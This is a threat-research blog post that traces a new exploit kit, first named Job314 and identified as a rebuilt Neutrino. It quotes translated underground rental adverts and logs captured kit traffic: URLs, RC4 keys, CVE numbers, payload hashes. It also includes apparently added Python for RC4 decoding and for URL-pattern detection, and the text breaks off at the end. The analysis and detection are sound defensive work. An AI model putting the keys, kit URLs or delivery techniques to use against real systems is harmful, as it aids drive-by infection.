2014-11-21 - Landscape

Neutrino: The comeback! (or Job314, the Alter EK)

Disclaimer: Once again I won't go into a deep analysis of the EK in this post.
It's more of a connecting-the-dots one.
Big thanks: Timo Hirvonen, @Malc0de, @EKWatcher@node5 for all the help on this.

In September a post from Alter appeared on the underground. He was looking for traffic to test an exploit kit he was building.

Hi everyone.
We are looking for someone with a large and stable flow of traffic from their own hacked sites.
The traffic is needed for debugging and fine-tuning the exploit pack.
What exactly is required:
A delivery rate of 1k hosts per 3-5 minutes.
Access to a TDS or any other panel where I could turn traffic to the pack's test stream on or off myself at any time convenient for me.
The TDS must support working with an auto-pickup API.

From our side:
One month on a dedicated server for free
Subsequent rental on preferential terms

A private solution with a limited set.
We'll be glad to hear from a serious person with reputation.
Contact: PM.

Google Translated as :

Looking for a man with a large and stable flow of cores from your scrap.
Traffic needed for debugging and fine-tuning of the bunch.
What exactly is required:
Speed plum 1k hosts 3-5 minutes.
Access TDS or any other socket where I could turn on or off myself to the test stream traf ligament at any convenient time for me.
RTD should support the work with the API avtozabora.

For its part:
Month for a dedicated server for free
Leaseback on preferential terms

Private decision with a limited set.
We will be glad serious man with a turnip.
Contact PM.

On the 26th of September I spotted something that was a really good candidate for an "Alter EK".

Alter EK candidate - 2014-09-26
Many things were pointing to Alter EK:
- The chronology (we do not see a new pattern really often)
- The payload was calling back to the EK
and other hints (traffic filtering upfront) were confirming a "training range".

Talking with Will Metcalf from Emerging Threats, we decided to name that exploit kit Job314 (cf. the Knock part).

Some new tricks there: the Java calls were embedded in the Flash.
Same for CVE-2013-2551 (IE), embedded inside the Flash.

We saw the evolution all the following weeks.

Job314 - Test Thread - 2014-10-20

A week ago Alter published a new advert :

A private exploit pack with a high penetration rate and stable cleanliness.
Monthly rental from $3000
Rental only on dedicated servers.
Domains and fronts are not included in the rental price.
Information on the composition of the exploits is not provided.

A one-day test for $100 (50k hosts) is possible.
Escrow only from this board and at your expense.

Jabber: [email protected]
Google Translated as :
Privacy punching a bunch of high purity and stable.
Month lease at $ 3000
Rent only on dedicated servers.
Domains and fronts in the rental price are not included.
Information on the composition of exploits is not available.

Possible test day $ 100 (50k hosts).
Guarantee only with this Bordeaux and at your expense.

Jabber: [email protected]

The big surprise was in the Screenshot :

Alter EK screenshots - Neutrino !

So after disappearing around the 17th of March, Neutrino is back!

Rebuilt from scratch, it seems, and what we called Job314 is this Neutrino "2".

Today, checking a distribution path that usually redirects to Flash EK (Necurs in /sv62a76d18537/ )

Distribution path to Necurs via "script" redirector and Flash EK
then, after a few days of Angler EK with Necurs pushed by Bedep, I landed on:

Neutrino pushing Necurs
2014-11-20 (and drop callbacks)

Let's take a look at this

Neutrino Pass:

Neutrino - 4 CVE in 1 Flash

GET http://amtudatqfi.border2 .xyz:47130/establish/40006/disguise/67531/harmony/25804/duke/grunt/north/5261/cart/51566/peter/shove/solitary/labour/squat/glad/
200 OK (text/html)

Neutrino Landing - 2014-11-20
Straight to the Flash.
Unescaping the base64 blob and applying the RC4 key we can find in the Flash

RC4 key: lrnfsvobuudc

we get:

Path fired for each exploit
(note the payload key: uzxceruvsl)

The different URIs for the different exploits.

GET http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js
200 OK (text/javascript)

GET http://amtudatqfi.border2 .xyz:47130/dark/9844/watch/5350/slip/64080/explanation/41483/mend/93598/collapse/39865/model/25005/
200 OK (text/html) Flash containing at least CVE-2014-6332, CVE-2013-2551, CVE-2014-0515, CVE-2014-0569   7a5f2d7efe55020e65dcdd77bcdf853e

The four Rc4ed Exploits embedded in the single flash
Neutrino 2014-11-21

GET http://wyuye.border2 .xyz:38779/false/hood/broom/9264/lover/22172/permit/45653/madam/44441/downstairs/grand/military/measure/themself/65550/
200 OK (application/octet-stream)  RC4 (Key : uzxceruvsl ) encoded Necurs f185111b2b0c61b26f2cdae1fee81031

Note : User-Agent: Mozilla
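The unwrapping described above (escaped base64 blob, then RC4 with the key found in the Flash) and the RC4-encoded payload download are the same primitive, so here is one added Python example, written for this post and not taken from the kit or from the author's tooling. It implements plain RC4, a decoder for the landing blob, and a decoder for a fetched payload body that checks for the "MZ" PE header as a sanity test on the key. The two keys are the ones quoted in the post; the sample blob and sample payload body are constructed in the block (they are not captured traffic), and the JSON-like plaintext is a made-up stand-in for the real path list.

```python
import base64
from typing import Tuple
from urllib.parse import quote, unquote

# Keys quoted in the post: landing-page blob key and payload key.
LANDING_KEY = "lrnfsvobuudc"
PAYLOAD_KEY = "uzxceruvsl"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Symmetric: one call both encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation + XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decode_landing_blob(blob: str, key: str = LANDING_KEY) -> bytes:
    """Undo the landing-page wrapping described in the post:
    JS escape() -> base64 -> RC4. Returns the decrypted bytes."""
    return rc4(key.encode(), base64.b64decode(unquote(blob)))


def decode_payload(body: bytes, key: str = PAYLOAD_KEY) -> Tuple[bytes, bool]:
    """RC4-decrypt a fetched payload body and report whether the result
    starts with the 'MZ' PE header (a quick sanity check that the key is right)."""
    plain = rc4(key.encode(), body)
    return plain, plain.startswith(b"MZ")


def encode_landing_blob(plaintext: bytes, key: str = LANDING_KEY) -> str:
    """Inverse of decode_landing_blob; only used here to build constructed samples."""
    return quote(base64.b64encode(rc4(key.encode(), plaintext)).decode(), safe="")


# Constructed sample, not captured traffic: a fake exploit-path list wrapped
# the same way as the post describes, so the decoder can be exercised offline.
SAMPLE_PLAINTEXT = b'{"paths":["/constructed/1/","/constructed/2/"],"key":"CONSTRUCTED"}'
SAMPLE_BLOB = encode_landing_blob(SAMPLE_PLAINTEXT)

# Constructed fake payload body: a stub beginning with the PE magic bytes,
# RC4-encoded with the payload key (no real binary involved).
SAMPLE_PAYLOAD_BODY = rc4(PAYLOAD_KEY.encode(), b"MZ" + b"\x00" * 62 + b"constructed-stub")


if __name__ == "__main__":
    print(decode_landing_blob(SAMPLE_BLOB))
    plain, is_pe = decode_payload(SAMPLE_PAYLOAD_BODY)
    print("PE header present:", is_pe, "| length:", len(plain))
```

On a real capture you would feed decode_landing_blob the string taken from the landing page and decode_payload the raw body of the application/octet-stream response; if the MZ check fails, the first thing to revisit is the key extracted from the Flash.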

Based on what we saw earlier, we can say that it's CVE-2014-6332 that owned that VM.

GET http://wyuye.border2 .xyz:38779/sweet.pl?whistle=word&more=start&wick=pressure&gasp=warm&join=victim&proper=52499&camera=44137&overhead=19904
404 Not Found (text/html) < CVE-2014-0569 call; 404ed maybe because of the 200 OK on the previous call.
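The captures above share a shape that is useful on the defender side: a high, non-standard port, a long path made only of lowercase dictionary words and short numbers, and a bare "Mozilla" User-Agent on the octet-stream payload fetch. As an added example (my own Python, not from the post or from Emerging Threats), the block below turns those observations into a small heuristic and runs it over a constructed tab-separated proxy log. The hostnames are placeholders, the thresholds (segment count, word and number lengths, port list) are my assumptions, and the path shapes mirror the post's captures without reusing its domains.

```python
import re
from urllib.parse import urlsplit

# Constructed tab-separated proxy log (not real traffic):
# timestamp, user-agent, URL, status, content-type. Hostnames are placeholders.
SAMPLE_LOG = "\n".join([
    "2014-11-20T10:01:02Z\tMozilla/5.0 (Windows NT 6.1)\thttp://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js\t200\ttext/javascript",
    "2014-11-20T10:01:03Z\tMozilla/5.0 (Windows NT 6.1)\thttp://landing.example.test:47130/establish/40006/disguise/67531/harmony/25804/duke/grunt/north/5261/\t200\ttext/html",
    "2014-11-20T10:01:09Z\tMozilla\thttp://payload.example.test:38779/false/hood/broom/9264/lover/22172/permit/45653/madam/44441/\t200\tapplication/octet-stream",
    "2014-11-20T10:02:00Z\tMozilla/5.0 (Windows NT 6.1)\thttp://www.example.test/news/2014/11/20/article.html\t200\ttext/html",
])

WORD = re.compile(r"^[a-z]{3,12}$")   # lowercase dictionary-word segment (assumed lengths)
NUM = re.compile(r"^\d{3,6}$")        # short numeric segment (assumed lengths)


def uri_reasons(url: str, user_agent: str, content_type: str) -> list:
    """Return the heuristic reasons (possibly empty) why one request resembles
    the Neutrino traffic shown in the post. Thresholds are my assumptions."""
    parts = urlsplit(url)
    segs = [s for s in parts.path.split("/") if s]
    reasons = []
    if parts.port not in (None, 80, 443):
        reasons.append("nonstandard_port")
    if (len(segs) >= 6
            and all(WORD.match(s) or NUM.match(s) for s in segs)
            and any(NUM.match(s) for s in segs)):
        reasons.append("word_number_path")
    if user_agent == "Mozilla" and content_type == "application/octet-stream":
        reasons.append("bare_mozilla_ua_binary")
    # Require the path shape plus at least one more signal to keep noise down.
    return reasons if "word_number_path" in reasons and len(reasons) >= 2 else []


def scan_log(text: str) -> list:
    """Run uri_reasons over each log line; return (url, reasons) for the hits."""
    hits = []
    for line in text.splitlines():
        ts, ua, url, status, ctype = line.split("\t")
        reasons = uri_reasons(url, ua, ctype)
        if reasons:
            hits.append((url, reasons))
    return hits


if __name__ == "__main__":
    for url, reasons in scan_log(SAMPLE_LOG):
        print(url, "->", ", ".join(reasons))
```

The swfobject.js and news-article lines fall through because their paths contain segments that are neither a word nor a number; the two kit requests are flagged, and the payload fetch additionally carries the bare-UA signal. Treat this as a triage filter rather than a signature: the word list and number ranges are easy for the kit to change, so it is best paired with the port and content-type observations.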

Files: That Flash is well thought out and seems easy to reuse; I will hold on to this one.
Fiddler pushed to VT here.
2014-11-24 - SWF: 19a6ef1cf490aec30018d95a4f07f42a
Let's finish with one piece of advice from Will Metcalf (Emerging Threats):